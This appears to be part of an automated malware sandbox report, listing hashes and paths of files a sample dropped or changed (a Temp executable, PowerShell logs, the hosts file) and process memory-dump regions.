SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
C:\Users\Admin\AppData\Local\Temp\11.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Users\Admin\AppData\Local\Temp\11.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
\??\pipe\LOCAL\crashpad_5048_KOXSMRKMQDAMJWBCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/220-231-0x0000000000000000-mapping.dmp
-
memory/312-148-0x00007FFEA6FD0000-0x00007FFEA71C5000-memory.dmpFilesize
2.0MB
-
memory/312-147-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/312-143-0x0000000000000000-mapping.dmp
-
memory/312-146-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/316-230-0x0000000000000000-mapping.dmp
-
memory/372-162-0x0000000000000000-mapping.dmp
-
memory/400-178-0x0000000000000000-mapping.dmp
-
memory/428-241-0x0000000000000000-mapping.dmp
-
memory/516-232-0x0000000000000000-mapping.dmp
-
memory/792-226-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/792-256-0x00000155DF520000-0x00000155DF532000-memory.dmpFilesize
72KB
-
memory/792-223-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/792-262-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/1052-196-0x0000000000000000-mapping.dmp
-
memory/1120-242-0x0000000000000000-mapping.dmp
-
memory/1224-188-0x0000000000000000-mapping.dmp
-
memory/1244-155-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/1244-153-0x000001D454BF0000-0x000001D454C12000-memory.dmpFilesize
136KB
-
memory/1244-152-0x0000000000000000-mapping.dmp
-
memory/1472-164-0x0000000000000000-mapping.dmp
-
memory/1528-205-0x0000000000000000-mapping.dmp
-
memory/1612-167-0x0000000000000000-mapping.dmp
-
memory/1732-204-0x0000000000000000-mapping.dmp
-
memory/1776-195-0x0000000000000000-mapping.dmp
-
memory/1860-251-0x0000000000000000-mapping.dmp
-
memory/1968-173-0x0000000000000000-mapping.dmp
-
memory/1996-198-0x0000000000000000-mapping.dmp
-
memory/2012-210-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/2012-213-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/2012-208-0x0000000000000000-mapping.dmp
-
memory/2012-211-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/2012-212-0x00007FFEA6FD0000-0x00007FFEA71C5000-memory.dmpFilesize
2.0MB
-
memory/2012-214-0x00007FFEA6FD0000-0x00007FFEA71C5000-memory.dmpFilesize
2.0MB
-
memory/2064-237-0x0000019852900000-0x0000019852906000-memory.dmpFilesize
24KB
-
memory/2064-240-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/2064-215-0x0000000000000000-mapping.dmp
-
memory/2064-236-0x00000198528F0000-0x00000198528F8000-memory.dmpFilesize
32KB
-
memory/2064-235-0x0000019852930000-0x000001985294A000-memory.dmpFilesize
104KB
-
memory/2064-228-0x00000198526D0000-0x00000198526EC000-memory.dmpFilesize
112KB
-
memory/2064-234-0x00000198524C0000-0x00000198524CA000-memory.dmpFilesize
40KB
-
memory/2064-233-0x0000019852910000-0x000001985292C000-memory.dmpFilesize
112KB
-
memory/2064-229-0x00000198524B0000-0x00000198524BA000-memory.dmpFilesize
40KB
-
memory/2064-227-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/2064-238-0x0000019852950000-0x000001985295A000-memory.dmpFilesize
40KB
-
memory/2064-224-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/2160-193-0x0000000000000000-mapping.dmp
-
memory/2192-254-0x0000000000000000-mapping.dmp
-
memory/2224-247-0x0000000000000000-mapping.dmp
-
memory/2284-186-0x0000000000000000-mapping.dmp
-
memory/2336-255-0x0000000000000000-mapping.dmp
-
memory/2344-197-0x0000000000000000-mapping.dmp
-
memory/2788-192-0x0000000000000000-mapping.dmp
-
memory/2852-171-0x0000000000000000-mapping.dmp
-
memory/2952-163-0x0000000000000000-mapping.dmp
-
memory/3132-263-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3132-261-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3132-264-0x0000000000C50000-0x0000000000C70000-memory.dmpFilesize
128KB
-
memory/3132-265-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3132-259-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3132-267-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3140-249-0x0000000000000000-mapping.dmp
-
memory/3144-203-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/3144-225-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/3292-170-0x0000000000000000-mapping.dmp
-
memory/3292-202-0x0000000000000000-mapping.dmp
-
memory/3316-180-0x0000000000000000-mapping.dmp
-
memory/3404-183-0x0000000000000000-mapping.dmp
-
memory/3484-176-0x0000000000000000-mapping.dmp
-
memory/3840-168-0x0000000000000000-mapping.dmp
-
memory/3840-201-0x0000000000000000-mapping.dmp
-
memory/3880-217-0x0000000000000000-mapping.dmp
-
memory/3924-190-0x0000000000000000-mapping.dmp
-
memory/3928-199-0x0000000000000000-mapping.dmp
-
memory/3928-165-0x0000000000000000-mapping.dmp
-
memory/3980-219-0x0000000000000000-mapping.dmp
-
memory/4068-266-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/4068-258-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/4068-257-0x00000241D07E0000-0x00000241D07E7000-memory.dmpFilesize
28KB
-
memory/4108-245-0x0000000000000000-mapping.dmp
-
memory/4192-160-0x0000000000000000-mapping.dmp
-
memory/4276-151-0x0000000000000000-mapping.dmp
-
memory/4364-172-0x0000000000000000-mapping.dmp
-
memory/4364-252-0x0000000000000000-mapping.dmp
-
memory/4416-169-0x0000000000000000-mapping.dmp
-
memory/4416-184-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/4416-200-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/4424-161-0x0000000000000000-mapping.dmp
-
memory/4516-246-0x0000000000000000-mapping.dmp
-
memory/4552-194-0x0000000000000000-mapping.dmp
-
memory/4676-250-0x0000000000000000-mapping.dmp
-
memory/4696-133-0x0000000005650000-0x000000000575A000-memory.dmpFilesize
1.0MB
-
memory/4696-135-0x00000000058C0000-0x0000000005936000-memory.dmpFilesize
472KB
-
memory/4696-139-0x00000000061C0000-0x0000000006226000-memory.dmpFilesize
408KB
-
memory/4696-138-0x00000000060C0000-0x00000000060DE000-memory.dmpFilesize
120KB
-
memory/4696-130-0x0000000000B90000-0x0000000000BB0000-memory.dmpFilesize
128KB
-
memory/4696-140-0x0000000007D60000-0x0000000007F22000-memory.dmpFilesize
1.8MB
-
memory/4696-136-0x00000000059E0000-0x0000000005A72000-memory.dmpFilesize
584KB
-
memory/4696-132-0x0000000005520000-0x0000000005532000-memory.dmpFilesize
72KB
-
memory/4696-141-0x0000000008460000-0x000000000898C000-memory.dmpFilesize
5.2MB
-
memory/4696-142-0x0000000007110000-0x0000000007160000-memory.dmpFilesize
320KB
-
memory/4696-131-0x0000000005A80000-0x0000000006098000-memory.dmpFilesize
6.1MB
-
memory/4696-134-0x0000000005580000-0x00000000055BC000-memory.dmpFilesize
240KB
-
memory/4696-137-0x0000000006650000-0x0000000006BF4000-memory.dmpFilesize
5.6MB
-
memory/4728-221-0x0000000000000000-mapping.dmp
-
memory/4852-248-0x0000000000000000-mapping.dmp
-
memory/4892-156-0x0000000000000000-mapping.dmp
-
memory/4908-157-0x0000000000000000-mapping.dmp
-
memory/4920-253-0x0000000000000000-mapping.dmp
-
memory/4928-159-0x0000000000000000-mapping.dmp
-
memory/4984-243-0x0000000000000000-mapping.dmp
-
memory/5000-244-0x0000000000000000-mapping.dmp
-
memory/5028-154-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/5028-150-0x000001F57AB00000-0x000001F57AF1E000-memory.dmpFilesize
4.1MB
-
memory/5028-206-0x00007FFE885C0000-0x00007FFE89081000-memory.dmpFilesize
10.8MB
-
memory/5048-149-0x0000000000000000-mapping.dmp
-
memory/5076-166-0x0000000000000000-mapping.dmp
-
memory/5092-158-0x0000000000000000-mapping.dmp